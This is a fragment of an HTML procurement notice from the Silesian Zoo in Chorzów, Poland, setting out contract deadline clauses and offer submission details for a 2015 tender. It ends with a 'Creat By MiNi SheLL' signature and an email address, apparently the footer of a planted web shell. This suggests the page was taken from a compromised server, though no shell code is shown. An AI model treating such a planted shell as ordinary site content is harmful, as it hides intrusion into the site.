10. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 2  termin zakończenia robót może ulec odpowiedniemu  przedłużeniu, nie dłużej jednak niż  o okres trwania tych okoliczności.
  
11. Wykonawca nie będzie uprawniony do wystąpienia z wnioskiem o przedłużenie terminu wykonania umowy, zwiększenie wynagrodzenia, jeżeli konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.silesia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Śląski Ogród Zoologiczny, 41-501 Chorzów, Promenada Gen. J. Ziętka 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2015 godzina 10:00, miejsce: Śląski Ogród Zoologiczny, 41-501 Chorzów, Promenada Gen. J. Ziętka 7, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com